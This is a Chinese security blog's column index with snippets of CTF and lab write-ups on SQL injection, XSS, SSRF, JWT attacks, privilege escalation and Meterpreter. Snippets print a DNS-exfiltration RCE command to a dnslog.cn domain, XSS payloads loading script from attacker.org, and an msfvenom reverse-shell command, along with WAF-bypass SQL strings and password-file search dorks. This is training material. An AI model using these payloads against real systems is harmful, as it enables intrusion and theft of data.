信息安全
文章平均质量分 64
devil8123665
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
文件上传 .htaccess 与.user.ini
htaccess uesr.ini原创 2023-03-13 08:46:16 · 3167 阅读 · 0 评论 -
sql注入之order by注入
在安恒杯看到了利用order by进行盲注,记得自己之前好像总结过order by后的注入方法,翻笔记发现确实是有一篇标题为order by注入的笔记,然而里面什么都没写。看了下详细信息,发现是17年8月11号创建的。真的是拖延症拖到忘记啊。order by是mysql中对查询数据进行排序的方法, 使用示例这里的重点在于order by后既可以填列名或者是一个数字。举个例子: id是user表的第一列的列名,那么如果想根据id来排序,有两种写法:order by盲注结合union来盲注这转载 2022-06-22 12:56:14 · 2036 阅读 · 0 评论 -
linux系统提权参考
1、实战Linux下三种不同方式的提权技巧 - 安全客,安全资讯平台2、对Linux 提权的简单总结:https://xz.aliyun.com/t/79243、Basic Linux Privilege Escalation - g0tmi1k4、GTFOBins原创 2021-12-09 22:09:32 · 282 阅读 · 0 评论 -
VulnHub breach1.0
配置靶机网络作者提示:The VM is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet.意思是靶机已经配置了静态IP地址为192.168.110.140,所以为了和靶机通行需要把kali主机的网卡设置一下。这里在virtualbox中可以配置一块新的网卡,为了在同一地址段,设置如下。然后让靶机和kali原创 2021-12-03 19:25:46 · 999 阅读 · 0 评论 -
Web中常见的绕过和技巧
参考文献Web中常见的绕过和技巧 - mrhonest - 博客园SQL注入十六进制绕过引号 slect table_name from information_schema.table where table_schema="sqli"; slect table_name from information_schema.table where table_schema=0x73716c69; slect table_name from information_.转载 2021-10-15 21:00:23 · 1259 阅读 · 0 评论 -
零组文库,想用的抓紧
零组文库已经是关闭了,在网上找到了一个备份站点:主页 · 资料文库网页太多,就写了个脚本,但是,太多的请求访问,结果就访问不了了,脚本如下#!C:\Python3.7# -*- coding:utf-8 -*-import requestsfrom lxml import etreeimport osimport redef get_date(url): try: req =requests.get(url) req.encoding原创 2021-09-30 20:05:20 · 1637 阅读 · 0 评论 -
Nessus中文使用教程
https://www.wangan.com/docs/nessus转载 2021-06-17 09:53:29 · 12843 阅读 · 0 评论 -
lkwa-blind-rce盲打rce
1、blind-rce因为是盲打,数据不能带出,因此采用dns查询的方式把数据带出到dns服务器上。采用dnslog站点:http://www.dnslog.cn/在盲打界面输入指令ping `whoami`.5w8un1.dnslog.cn提交后到dnslog中刷新记录可以看到如下图中所示用户为“application”针对根目录测试ls / | awk -F' ' '{system("ping -c 2 "NR".5w8un1.dnslog....原创 2021-05-26 14:55:50 · 801 阅读 · 0 评论 -
Pikachu靶场----答案集合
题记 这个靶场是在内推圈爷一个采访在顺风的一个安全小哥视频里那个小哥分享的,巧的是我当时正在找靶场,真是感觉有时候一些事情很奇妙,你刚好需要的时候它正好出现。此靶场名为皮卡丘靶场,可爱中透着一股霸气,搭建环境为phpstudy+mysql。可以在靶场里面玩玩kali,菜刀等高级渗透。我搭建的虚拟环境有win10,win8,linux。 这篇文章属于我在网上查找的比较好的这个靶场答案解析,用于“日”后查阅。不定期更新。 Pikachu靶场----X...转载 2021-04-30 14:28:13 · 1595 阅读 · 0 评论 -
xss测试语句及测试站点总结
利用方法Script 标签Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本:<script>alert("XSS")</script><script src="http://attacker.org/malicious.js"></script>Src属性<img src=x onerror=prompt(1);><img/src=aaa.jpg onerror=prompt(1);><vi.原创 2021-04-09 09:31:09 · 5900 阅读 · 0 评论 -
SSTI/沙盒逃逸详细总结
一 flask1 、基本用法>>> [].__class__.__base__<class 'object'>>>> [].__class__.__mro__(<class 'list'>, <class 'object'>)>>> [].__class__.__bases__(<class 'object'>,)2、取子类[].__class__.__base__.__sub转载 2021-03-09 20:13:57 · 1796 阅读 · 0 评论 -
栈基本原理
栈溢出原理和利用学习https://blog.csdn.net/sinat_31054897/article/details/82223889函数调用过程中函数栈详解https://blog.csdn.net/u012218309/article/details/81669227转载 2021-02-21 22:04:42 · 166 阅读 · 0 评论 -
php伪协议实现命令执行的七种姿势
首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议的利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data:/转载 2021-01-26 09:37:26 · 389 阅读 · 0 评论 -
ctfhub 技能树 JSON Web Token 修改签名算法
1、题目提示:有些JWT库支持多种密码算法进行签名、验签。若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。2、打开题目看到题目给的源码,源码如下,<?phprequire __DIR__ . '/vendor/autoload.php';use \Firebase\JWT\JWT;class JWTHelper { public static function encode($pay原创 2021-01-23 10:17:33 · 7227 阅读 · 3 评论 -
ctfhub 技能树 JSON Web Token 弱秘钥
1、题目提示:如果JWT采用对称加密算法,并且密钥的强度较弱的话,攻击者可以直接通过蛮力攻击方式来破解密钥。尝试获取flag2、burpsuit抓包3、获取token进行暴力破解eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJwYXNzd29yZCIsInJvbGUiOiJndWVzdCJ9.xCCx-8iRz4HybhQ5iz3zHLniJ5koa7iflMALlaos6ic原创 2021-01-21 00:12:06 · 6361 阅读 · 2 评论 -
如何查看网页的编码格式
最近在做爬虫的时候,发现部分网页爬出来的数据是乱码(网易新闻)。 搞了半天,最后发现网易新闻的编码格式是GBK不是UTF-8。 查看网页的编码格式的方法就是:1、在网页按F12,打开开发者工具2、在console 中输入“document.charset”查看页面编码,如下》document.charset》"UTF-8"3、设置spider的编码格式python req = requests.get(url) req.encoding="UTF-8"参考原创 2021-01-18 20:40:26 · 7230 阅读 · 2 评论 -
【tool】中国蚁剑(AntSword)下载、安装、使用教程
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。通俗的讲:中国蚁剑是 一 款比菜刀还牛的shell控制端软件。中国蚁剑推崇模块化的开发思想,遵循开源,就要开得漂亮的原则,致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及其修改说明,努力让大家可以一起为这个项目贡献出力所能及的点滴,让这款工具真正能让大家用得顺心、舒适,让它能为大家施展出最人性化最适合你的能力!一、中国蚁剑下载唯一官方github下载地址:https://gi转载 2021-01-16 20:35:44 · 2604 阅读 · 0 评论 -
ssrf整理
SSRF服务器端请求伪造漏洞基础https://zhuanlan.zhihu.com/p/116039804SSRF漏洞中使用到的其他协议(附视频+Py)https://zhuanlan.zhihu.com/p/115222529Gopher协议在SSRF漏洞中的深入研究(附视频讲解)https://zhuanlan.zhihu.com/p/112055947SSRF漏洞攻击Redis-从零到获取Shell(脚本+视频)https://zhuanlan.zhihu.com/p/1转载 2021-01-08 10:49:15 · 175 阅读 · 0 评论 -
SSRF之文件包含
SSRF之文件包含https://www.cnblogs.com/lyxsalyd/p/12594797.html转载 2020-12-29 21:41:15 · 511 阅读 · 0 评论 -
ctfhub_REC_综合练习
目录1 打开题目,查看如下源码2代码分析3查看当前路径4查看flag_is_here目录5获取flag值6使用的python脚本1 打开题目,查看如下源码<?php$res = FALSE;if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/(\||&|;| |\/|cat|...原创 2020-12-29 20:47:25 · 1271 阅读 · 0 评论 -
ctfhub 信息泄露 备份文件下载
工具:dirbsearch.py https://github.com/barunesh/dirsearch1 网站源码根据提示制作字典web.tarwebsite.tarbackup.tarback.tarwww.tarwwwroot.tartemp.tarweb.tar.gzwebsite.tar.gzbackup.tar.gzback.tar.gzwww.tar.gzwwwroot.tar.gztemp.tar.gzweb.zipwebsite.zipbackup原创 2020-12-19 23:40:16 · 774 阅读 · 1 评论 -
xxe漏洞原理与案例
前期知识:xml DTDhttps://www.w3school.com.cn/dtd/dtd_intro.asp1、基本知识 :XXE漏洞学习https://www.cnblogs.com/zhaijiahui/p/9147595.html#autoid-5-1-62、案例分析 一篇文章带你深入理解漏洞之 XXE 漏洞https://xz.aliyun.com/t/3357xxe攻击测试讲解https://www.freebuf.com/column/188849.html...转载 2020-12-11 10:19:10 · 602 阅读 · 0 评论 -
Meterpreter提权详解
转载https://www.cnblogs.com/backlion/p/9484950.html0x01 Meterpreter自动提权1.生成后门程序我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为:windows/me转载 2020-12-06 21:23:13 · 2016 阅读 · 0 评论 -
Meterpreter命令详解
转载:https://www.cnblogs.com/backlion/p/9484949.html0x01初识Meterpreter1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、.转载 2020-12-06 21:20:27 · 6438 阅读 · 0 评论 -
Angular使用及其安全问题分析
https://blog.csdn.net/wenrennaoda/article/details/898857221、逃逸Payload Angular通过“{{expression}}”来作为输出的标志,而对于双括号里面的内容Angular会计计算并输出结果。然而Angular模板表达式会经过沙箱验证,例如:1)不允许使用Function对象;2)不允许使用window对象;3)不允许使用dom对象;4)不允许使用Object对象;5)对obj对象的constructor进行检查,确保其...转载 2020-12-03 21:29:17 · 515 阅读 · 0 评论 -
内网渗透之端口转发与代理工具总结
https://www.freebuf.com/articles/web/170970.html理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的注:文中提到的所有工具下载地址https://github.com/Brucetg/Pentest-tools一、LCXlcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为por.转载 2020-12-01 19:33:38 · 3223 阅读 · 0 评论 -
常用标准请求头字段
常用标准请求头字段https://www.cnblogs.com/s313139232/p/7830983.htmlAccept设置接受的内容类型Accept: text/plainAccept-Charset设置接受的字符编码Accept-Charset: utf-8Accept-Encoding设置接受的编码格式Accept-Encoding: gzip, deflateAccept-Datetime设置接受的版本时间Accept-Datetim...转载 2020-11-25 17:03:50 · 4326 阅读 · 0 评论 -
php漏洞整理
1、php7-gc-bypassexp:https://github.com/devil8123665/exploits/blob/master/php7-gc-bypass/exploit.php题目:[GKCTF2020]CheckINwp:https://blog.csdn.net/m0_46230316/article/details/1064774172、phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞题目:[GWCTF 2019]我有一个数据库wp转载 2020-11-25 13:41:12 · 870 阅读 · 0 评论 -
select绕过
#WAFBypassingStrings:/*!%55NiOn*//*!%53eLEct*/%55nion(%53elect1,2,3)---+union+distinct+select++union+distinctROW+select+/**//*!12345UNIONSELECT*//**//**//*!50000UNIONSELECT*//**//**/UNION/**//*!50000SELECT*//**//*!5000...转载 2020-11-22 22:33:39 · 1539 阅读 · 0 评论 -
dirmap工具使用
1下载网址https://github.com/814561039/FUZZ-dic下载后,根据提示安装好包后第一次运行出现如下错误提示:TypeError: start() takes 1 positional argument but 2 were given错误处理python3 -m pip uninstall progressbarpython3 -m pip install progressbar22使用教程Dirmap:一款高级Web目录文件扫描工具https转载 2020-11-19 14:23:53 · 1190 阅读 · 0 评论 -
.user.ini文件构成的php后门
https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html案例:https://www.jianshu.com/p/2907426b4a91原文地址:http://drops.wooyun.org/tips/34240x00 背景这个估计很多同学看了不屑,认为是烂大街的东西了:.htaccess文件构成的PHP后门那么..转载 2020-11-01 11:39:51 · 407 阅读 · 1 评论 -
文件上传漏洞
PHP代码审计之文件上传漏洞https://www.cnblogs.com/wangtanzhi/p/12243206.html文件上传和解析漏洞的整理https://www.freebuf.com/articles/web/247419.html转载 2020-10-30 21:23:24 · 146 阅读 · 0 评论 -
php序列化与反序列化
四个实例递进php反序列化漏洞理解https://blog.csdn.net/nzjdsds/article/details/82703639?utm_medium=distribute.wap_relevant.none-task-blog-title-6php魔术方法https://www.php.net/manual/zh/language.oop5.magic.php#object.sleep本质:通过修改可控变量的值,使魔术方法完成用户特定功能的目的。...转载 2020-10-30 10:55:26 · 153 阅读 · 0 评论 -
web刷题记录,查询使用
1、[RoarCTF 2019]Easy Calchttps://buuoj.cnwp:https://blog.csdn.net/mochu7777777/article/details/109169796注意点:使用scandir()函数+chr()函数绕过代码执行/calc.php?%20num=var_dump(scandir(chr(47)))或者使用glob()函数/calc.php?%20num=var_dump(glob(chr(47).chr(42))..转载 2020-10-28 15:51:08 · 2934 阅读 · 0 评论 -
google语法
“Login: ” “password =” filetype: xls ( 搜索存储在excel文件中含有password的数据)。allinurl: auth_user_file.txt (搜索包含在服务器上的 auth_user_file.txt 的文件)。filetype: xls inurl: “password.xls” (查找 用户名和密码以excel格式)这个命令可以变为“admin.xls”.intitle: login password (获取登陆页面的连接,登陆关键词在标题转载 2020-10-03 21:17:18 · 555 阅读 · 0 评论 -
SQL注入一些过滤及绕过总结
SQL注入一些过滤及绕过总结https://blog.csdn.net/weixin_44300286/article/details/96597167转载 2020-09-23 12:38:20 · 40043 阅读 · 1 评论 -
SQl报错注入
报错注入:extractvalue、updatexml报错原理https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html学习基于extractvalue()和updatexml()的报错注入https://blog.csdn.net/zpy1998zpy/article/details/80631036sql基于 extractvalue(),floor(),updatexml()函数的报错注入https://blog.csdn.net/转载 2020-09-23 09:30:46 · 410 阅读 · 0 评论 -
SqL注入小结
第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。数字型:and 1=1 and 1=2 判断是否存在注入字符型:' and '1'='1 ' and '1'='2搜索型: 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='%IIS报错情况下使用:and user>0 (判断原创 2020-07-20 08:41:51 · 287 阅读 · 0 评论 -
burpsuit 抓取https包,证书问题,此证书已在此前安装为一个证书权威机构
一证书下载与安装转载:https://blog.csdn.net/supassxu/article/details/81448908二、此证书已在此前安装为一个证书权威机构证书删除路径在firefox的证书管理器中的证书机构下面删除了某个证书之后,要想再安装会提示“此证书已在此前安装为一个证书权威机构”。此时,关闭浏览器,删除C:\Users\xx\AppData\Roamin...转载 2020-02-29 14:46:56 · 5308 阅读 · 0 评论 -
DVWA file inclusion 出错 allow_url_fopen=0
在DVWA平台中测试文件包含是出现错误信息include(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0,原因是设置allow_url_open 与allow_url_include 位置不对,在C:\xampp\htdocs\DVWA\php.ini文件中都设置为on并不会起作用,需要...原创 2018-06-12 15:51:26 · 3877 阅读 · 0 评论
分享